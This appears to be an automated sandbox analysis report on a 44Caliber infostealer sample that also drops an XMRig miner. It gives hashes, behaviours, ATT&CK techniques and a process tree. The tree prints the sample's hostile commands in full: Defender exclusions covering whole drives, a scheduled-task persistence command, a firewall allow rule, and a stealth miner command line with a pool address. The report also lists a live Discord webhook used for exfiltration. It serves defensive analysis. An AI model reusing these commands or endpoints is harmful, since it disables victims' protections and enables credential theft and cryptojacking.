44caliber | 5b3608236eb01a9812bc32ca81bf7493c374f854ba7dd40fb422a7ff8b03ed67

Analysis

max time kernel
4294216s
max time network
170s
platform
windows7_x64
resource
win7-20220310-en
submitted
20-03-2022 05:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

65119209.exe
Size

5.2MB
MD5

32c5693987d03d80ea5d7d5632769cb8
SHA1

e8c8a465e6d6912afc99bbdf90cf08363cf184e4
SHA256

5b3608236eb01a9812bc32ca81bf7493c374f854ba7dd40fb422a7ff8b03ed67
SHA512

7948d57c378ed69531ba75059af8a17e5b9c3ee256c5c742d93d9f94c4c438a4845c5df8ab672aaba4ca1b8fdeb155b57b6753e438b3fde47d0490cd8b6ff11a

Score

10^/10

44caliber xmrig evasion miner persistence spyware stealer

Malware Config

Extracted

Family

44caliber

https://discordapp.com/api/webhooks/934716186313240606/NIuB64dK4IPafrX9FRy2wNNRrBnOxvdLjio6Ou2fEKxC9HrdYgZQcnvkOx-a4O9pNzdW

Signatures

44Caliber
An open source infostealer written in C#.
stealer 44caliber
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 11 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1452-136-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1452-139-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1452-141-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1452-144-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1452-147-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1452-149-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1452-152-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1452-156-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1452-163-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1452-165-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1452-167-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Executes dropped EXE 6 IoCs

Processes:

KLNR.exeWARZONEHACK.exeInsidious2.exeserver.exeservices64.exesihost64.exe

pid process

1168 KLNR.exe
1060 WARZONEHACK.exe
1288 Insidious2.exe
1668 server.exe
392 services64.exe
1892 sihost64.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Drops startup file 2 IoCs

Processes:

server.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c8a9da7fa674aa389aad9af7feb5a543.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c8a9da7fa674aa389aad9af7feb5a543.exe	server.exe

Loads dropped DLL 8 IoCs

Processes:

65119209.exeKLNR.execmd.execonhost.exe

pid process

1968 65119209.exe
1968 65119209.exe
1968 65119209.exe
1968 65119209.exe
1168 KLNR.exe
1168 KLNR.exe
1072 cmd.exe
1412 conhost.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1968	65119209.exe
1968	65119209.exe
1968	65119209.exe
1968	65119209.exe
1168	KLNR.exe
1168	KLNR.exe
1072	cmd.exe
1412	conhost.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

server.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Windows\CurrentVersion\Run\c8a9da7fa674aa389aad9af7feb5a543 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\c8a9da7fa674aa389aad9af7feb5a543 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 freegeoip.app
5 freegeoip.app

flow	ioc
4	freegeoip.app
5	freegeoip.app

Drops file in System32 directory 8 IoCs

Processes:

conhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs

Processes:

KLNR.exeserver.exe

pid	process
1168	KLNR.exe
1168	KLNR.exe
1168	KLNR.exe
1168	KLNR.exe
1168	KLNR.exe
1168	KLNR.exe
1168	KLNR.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 1412 set thread context of 1452 1412 conhost.exe svchost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

840 1452 WerFault.exe svchost.exe

description	pid	process	target process
PID 1412 set thread context of 1452	1412	conhost.exe	svchost.exe

pid	pid_target	process	target process
840	1452	WerFault.exe	svchost.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Insidious2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious2.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1920 schtasks.exe

pid	process
1920	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Insidious2.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exeserver.exepowershell.exe

pid	process
1288	Insidious2.exe
1288	Insidious2.exe
580	conhost.exe
1288	Insidious2.exe
2004	powershell.exe
1612	powershell.exe
1412	conhost.exe
1412	conhost.exe
960	powershell.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1616	powershell.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe
1668	server.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

server.exe

pid process

1668 server.exe

pid	process
1668	server.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

Processes:

Insidious2.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exeserver.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1288	Insidious2.exe
Token: SeDebugPrivilege	580	conhost.exe
Token: SeDebugPrivilege	2004	powershell.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	1412	conhost.exe
Token: SeDebugPrivilege	960	powershell.exe
Token: SeDebugPrivilege	1668	server.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: 33	1668	server.exe
Token: SeIncBasePriorityPrivilege	1668	server.exe
Token: 33	1668	server.exe
Token: SeIncBasePriorityPrivilege	1668	server.exe
Token: 33	1668	server.exe
Token: SeIncBasePriorityPrivilege	1668	server.exe
Token: 33	1668	server.exe
Token: SeIncBasePriorityPrivilege	1668	server.exe
Token: 33	1668	server.exe
Token: SeIncBasePriorityPrivilege	1668	server.exe
Token: 33	1668	server.exe
Token: SeIncBasePriorityPrivilege	1668	server.exe
Token: 33	1668	server.exe
Token: SeIncBasePriorityPrivilege	1668	server.exe
Token: 33	1668	server.exe
Token: SeIncBasePriorityPrivilege	1668	server.exe
Token: 33	1668	server.exe
Token: SeIncBasePriorityPrivilege	1668	server.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

KLNR.exeserver.exe

pid process

1168 KLNR.exe
1668 server.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

65119209.exeWARZONEHACK.execonhost.execmd.execmd.exeKLNR.execmd.exeserver.exeservices64.execonhost.execmd.exe

description	pid	process	target process
PID 1968 wrote to memory of 1168	1968	65119209.exe	KLNR.exe
PID 1968 wrote to memory of 1168	1968	65119209.exe	KLNR.exe
PID 1968 wrote to memory of 1168	1968	65119209.exe	KLNR.exe
PID 1968 wrote to memory of 1168	1968	65119209.exe	KLNR.exe
PID 1968 wrote to memory of 1060	1968	65119209.exe	WARZONEHACK.exe
PID 1968 wrote to memory of 1060	1968	65119209.exe	WARZONEHACK.exe
PID 1968 wrote to memory of 1060	1968	65119209.exe	WARZONEHACK.exe
PID 1968 wrote to memory of 1060	1968	65119209.exe	WARZONEHACK.exe
PID 1968 wrote to memory of 1288	1968	65119209.exe	Insidious2.exe
PID 1968 wrote to memory of 1288	1968	65119209.exe	Insidious2.exe
PID 1968 wrote to memory of 1288	1968	65119209.exe	Insidious2.exe
PID 1968 wrote to memory of 1288	1968	65119209.exe	Insidious2.exe
PID 1060 wrote to memory of 580	1060	WARZONEHACK.exe	conhost.exe
PID 1060 wrote to memory of 580	1060	WARZONEHACK.exe	conhost.exe
PID 1060 wrote to memory of 580	1060	WARZONEHACK.exe	conhost.exe
PID 1060 wrote to memory of 580	1060	WARZONEHACK.exe	conhost.exe
PID 580 wrote to memory of 1624	580	conhost.exe	cmd.exe
PID 580 wrote to memory of 1624	580	conhost.exe	cmd.exe
PID 580 wrote to memory of 1624	580	conhost.exe	cmd.exe
PID 1624 wrote to memory of 2004	1624	cmd.exe	powershell.exe
PID 1624 wrote to memory of 2004	1624	cmd.exe	powershell.exe
PID 1624 wrote to memory of 2004	1624	cmd.exe	powershell.exe
PID 580 wrote to memory of 1416	580	conhost.exe	cmd.exe
PID 580 wrote to memory of 1416	580	conhost.exe	cmd.exe
PID 580 wrote to memory of 1416	580	conhost.exe	cmd.exe
PID 1416 wrote to memory of 1920	1416	cmd.exe	schtasks.exe
PID 1416 wrote to memory of 1920	1416	cmd.exe	schtasks.exe
PID 1416 wrote to memory of 1920	1416	cmd.exe	schtasks.exe
PID 1168 wrote to memory of 1668	1168	KLNR.exe	server.exe
PID 1168 wrote to memory of 1668	1168	KLNR.exe	server.exe
PID 1168 wrote to memory of 1668	1168	KLNR.exe	server.exe
PID 1168 wrote to memory of 1668	1168	KLNR.exe	server.exe
PID 1624 wrote to memory of 1612	1624	cmd.exe	powershell.exe
PID 1624 wrote to memory of 1612	1624	cmd.exe	powershell.exe
PID 1624 wrote to memory of 1612	1624	cmd.exe	powershell.exe
PID 580 wrote to memory of 1072	580	conhost.exe	cmd.exe
PID 580 wrote to memory of 1072	580	conhost.exe	cmd.exe
PID 580 wrote to memory of 1072	580	conhost.exe	cmd.exe
PID 1072 wrote to memory of 392	1072	cmd.exe	services64.exe
PID 1072 wrote to memory of 392	1072	cmd.exe	services64.exe
PID 1072 wrote to memory of 392	1072	cmd.exe	services64.exe
PID 1668 wrote to memory of 1296	1668	server.exe	netsh.exe
PID 1668 wrote to memory of 1296	1668	server.exe	netsh.exe
PID 1668 wrote to memory of 1296	1668	server.exe	netsh.exe
PID 1668 wrote to memory of 1296	1668	server.exe	netsh.exe
PID 392 wrote to memory of 1412	392	services64.exe	conhost.exe
PID 392 wrote to memory of 1412	392	services64.exe	conhost.exe
PID 392 wrote to memory of 1412	392	services64.exe	conhost.exe
PID 392 wrote to memory of 1412	392	services64.exe	conhost.exe
PID 1412 wrote to memory of 1092	1412	conhost.exe	cmd.exe
PID 1412 wrote to memory of 1092	1412	conhost.exe	cmd.exe
PID 1412 wrote to memory of 1092	1412	conhost.exe	cmd.exe
PID 1092 wrote to memory of 960	1092	cmd.exe	powershell.exe
PID 1092 wrote to memory of 960	1092	cmd.exe	powershell.exe
PID 1092 wrote to memory of 960	1092	cmd.exe	powershell.exe
PID 1412 wrote to memory of 1892	1412	conhost.exe	sihost64.exe
PID 1412 wrote to memory of 1892	1412	conhost.exe	sihost64.exe
PID 1412 wrote to memory of 1892	1412	conhost.exe	sihost64.exe
PID 1092 wrote to memory of 1616	1092	cmd.exe	powershell.exe
PID 1092 wrote to memory of 1616	1092	cmd.exe	powershell.exe
PID 1092 wrote to memory of 1616	1092	cmd.exe	powershell.exe
PID 1412 wrote to memory of 1452	1412	conhost.exe	svchost.exe
PID 1412 wrote to memory of 1452	1412	conhost.exe	svchost.exe
PID 1412 wrote to memory of 1452	1412	conhost.exe	svchost.exe

C:\Users\Admin\AppData\Local\Temp\65119209.exe
"C:\Users\Admin\AppData\Local\Temp\65119209.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1968

C:\Users\Admin\AppData\Local\Temp\KLNR.exe
"C:\Users\Admin\AppData\Local\Temp\KLNR.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1168

C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1668

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
4⤵
PID:1296

C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe
"C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1060

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:580

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1612

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1416

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
5⤵
- Creates scheduled task(s)
PID:1920

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1072

C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:392

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
6⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1412

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
7⤵
- Suspicious use of WriteProcessMemory
PID:1092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616

C:\Windows\system32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
7⤵
- Executes dropped EXE
PID:1892

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
8⤵
PID:1060

C:\Windows\System32\svchost.exe
C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6238470 --pass=WarzoneHACK --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
7⤵
PID:1452

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1452 -s 124
8⤵
- Program crash
PID:840

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious2.exe"
2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1288

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

MD5
198458bfe3e5de2eb6737beb2d54c292

SHA1
59785684874f6b45205db1f96268593c97485dfe

SHA256
d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca

SHA512
7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

Download Submit
C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

MD5
198458bfe3e5de2eb6737beb2d54c292

SHA1
59785684874f6b45205db1f96268593c97485dfe

SHA256
d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca

SHA512
7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

Download Submit
C:\Users\Admin\AppData\Local\Temp\KLNR.exe

MD5
8563f76405eb62c0e2a62f57992cb413

SHA1
5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

SHA256
a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838

SHA512
e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

Download Submit
C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe

MD5
e066cd70ab7e9dc95320051773a5d8a9

SHA1
51692557ac7c4e99065c320557c341229481cfe4

SHA256
22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e

SHA512
b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe

MD5
e066cd70ab7e9dc95320051773a5d8a9

SHA1
51692557ac7c4e99065c320557c341229481cfe4

SHA256
22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e

SHA512
b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\server.exe

MD5
8563f76405eb62c0e2a62f57992cb413

SHA1
5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

SHA256
a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838

SHA512
e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
9542f730ec96bfcc506231c591780fbe

SHA1
f5beaeb8184a656d2933ff5e3bc48f44c81e943b

SHA256
1c75467f811d6ffb15d00100a3b88f45ba39e7dc076494267d3e0acb0e37e64e

SHA512
4858cd5a4999e95b1d971072b7bffeed4018d16d8acea12c743d677512ab3c705b31ff9c70e14a7c52b5368b63076cfcd4750004d49ccb1764d040b5f4a09bd4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
b537feb04fff5c541eb94eaae0b98f3b

SHA1
47b66de9f241fe60132c0d12d0908ced00f8707c

SHA256
c01afbb3a7d42d2d2c313d5fce9196aad454c218fb73fc83ca5cc6023ab364ab

SHA512
ce3feac069332544ec468e4fcdff1069424971d3905072e7acb7a676d00b7538be3db53efe356372f0f2159a88baf636c835e2d9b4d3f08444579f949f24960a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
b537feb04fff5c541eb94eaae0b98f3b

SHA1
47b66de9f241fe60132c0d12d0908ced00f8707c

SHA256
c01afbb3a7d42d2d2c313d5fce9196aad454c218fb73fc83ca5cc6023ab364ab

SHA512
ce3feac069332544ec468e4fcdff1069424971d3905072e7acb7a676d00b7538be3db53efe356372f0f2159a88baf636c835e2d9b4d3f08444579f949f24960a

Download Submit
C:\Windows\System32\Microsoft\Libs\sihost64.exe

MD5
3721b324b4d2c9dea6c6bc6a858fe337

SHA1
f3391c6414ed5bb89acc4ab5df2b837077a9a9c6

SHA256
fd8616ef4edbc3694ae31a87296dcb726eb9f16a0f7caa6e8ebea39a041db206

SHA512
bb3c57065b74398f194488cdc81b3562926a94053c84a0b47742ffa221dcff99cf41e8bbb3e7a390d7bfdbf5c658286d2ea12d70cad6c80cf2ee725f39364256

Download Submit
C:\Windows\System32\services64.exe

MD5
e066cd70ab7e9dc95320051773a5d8a9

SHA1
51692557ac7c4e99065c320557c341229481cfe4

SHA256
22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e

SHA512
b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

Download Submit
C:\Windows\system32\services64.exe

MD5
e066cd70ab7e9dc95320051773a5d8a9

SHA1
51692557ac7c4e99065c320557c341229481cfe4

SHA256
22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e

SHA512
b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\users\admin\appdata\local\temp\klnr.exe

MD5
8563f76405eb62c0e2a62f57992cb413

SHA1
5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

SHA256
a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838

SHA512
e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

Download Submit
\??\c:\users\admin\appdata\local\temp\server.exe

MD5
8563f76405eb62c0e2a62f57992cb413

SHA1
5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

SHA256
a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838

SHA512
e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

Download Submit
\Users\Admin\AppData\Local\Temp\Insidious2.exe

MD5
198458bfe3e5de2eb6737beb2d54c292

SHA1
59785684874f6b45205db1f96268593c97485dfe

SHA256
d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca

SHA512
7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

Download Submit
\Users\Admin\AppData\Local\Temp\KLNR.exe

MD5
8563f76405eb62c0e2a62f57992cb413

SHA1
5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

SHA256
a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838

SHA512
e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

Download Submit
\Users\Admin\AppData\Local\Temp\KLNR.exe

MD5
8563f76405eb62c0e2a62f57992cb413

SHA1
5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

SHA256
a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838

SHA512
e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

Download Submit
\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe

MD5
e066cd70ab7e9dc95320051773a5d8a9

SHA1
51692557ac7c4e99065c320557c341229481cfe4

SHA256
22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e

SHA512
b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

Download Submit
\Users\Admin\AppData\Local\Temp\server.exe

MD5
8563f76405eb62c0e2a62f57992cb413

SHA1
5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918

SHA256
